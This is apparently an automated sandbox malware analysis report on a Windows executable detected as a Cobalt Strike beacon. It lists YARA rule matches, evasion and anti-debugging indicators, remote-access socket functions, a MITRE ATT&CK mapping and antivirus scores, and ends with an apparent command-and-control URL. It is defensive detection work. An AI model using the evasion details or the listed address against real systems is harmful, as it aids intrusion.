          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@1/2@0/1
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007C0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_007C0B70
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007C3A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep, 0_2_007C3A64
          Source: A1E0xfcSNl.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: A1E0xfcSNl.exe, ReversingLabs: Detection: 84%
          Source: A1E0xfcSNl.exe, Virustotal: Detection: 79%
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: cryptnet.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: webio.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: cabinet.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007BD83C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_007BD83C
          Source: A1E0xfcSNl.exe, Static PE information: section name: .xdata
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_0079776C push 0000006Ah; retf 0_2_00797784
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007E916C push 0000006Ah; retf 0_2_007E9184
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007D01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007D01A8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007C5854 0_2_007C5854
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007BFA1C 0_2_007BFA1C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Window / User API: threadDelayed 6393
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Window / User API: threadDelayed 3234
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Evasive API call chain: GetLocalTime,DecisionNodes graph_0-37777
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-37920
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, API coverage: 6.6 %
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007BFA1C 0_2_007BFA1C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424, Thread sleep count: 6393 > 30
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424, Thread sleep time: -63930000s >= -30000s
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7436, Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424, Thread sleep count: 3234 > 30
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe TID: 7424, Thread sleep time: -32340000s >= -30000s
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Last function: Thread delayed
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Last function: Thread delayed
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_007C9220
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_007C1C30
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Thread delayed: delay time: 60000
          Source: A1E0xfcSNl.exe, 00000000.00000003.1787137011.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, API call chain: ExitProcess graph end node graph_0-37851

          Anti Debugging

          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_0-37496
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007DF810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte, 0_2_007DF810
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_007D9744
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007BD83C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_007BD83C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007DC0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock, 0_2_007DC0C8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA, 0_2_00401180
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_00402F62 SetUnhandledExceptionFilter, 0_2_00402F62
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_00401A70
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_004542E4 SetUnhandledExceptionFilter, 0_2_004542E4
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007E24F0 SetUnhandledExceptionFilter, 0_2_007E24F0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe, Code function: 0_2_007D44D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_007D44D0

          HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007CDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007E2050 AllocateAndInitializeSid
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Remote Access Functionality

Source: Yara match | File source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR
Source: Yara match | File source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C6A78 socket,htons,ioctlsocket,closesocket,bind,listen
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C6670 htonl,htons,socket,closesocket,bind,ioctlsocket
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007E2630 bind
Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007CEE8C socket,closesocket,htons,bind,listen
MITRE ATT&CK Matrix

Techniques are listed per tactic column, in matrix order; a leading number is the count shown next to that technique in the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 2 Valid Accounts; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 2 Valid Accounts; 21 Access Token Manipulation; 1 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 2 Valid Accounts; 111 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 1 Process Injection; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools; HTML Smuggling; Dynamic API Resolution
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 1 Query Registry; 241 Security Software Discovery; 111 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 4 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 2 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Source | Detection | Scanner | Label
A1E0xfcSNl.exe | 84% | ReversingLabs | Win64.Backdoor.CobaltStrike
A1E0xfcSNl.exe | 79% | Virustotal |
A1E0xfcSNl.exe | 100% | Avira | HEUR/AGEN.1344321
A1E0xfcSNl.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://89.197.154.116:7810/en_US/all.jsM9 | 20% | Virustotal |
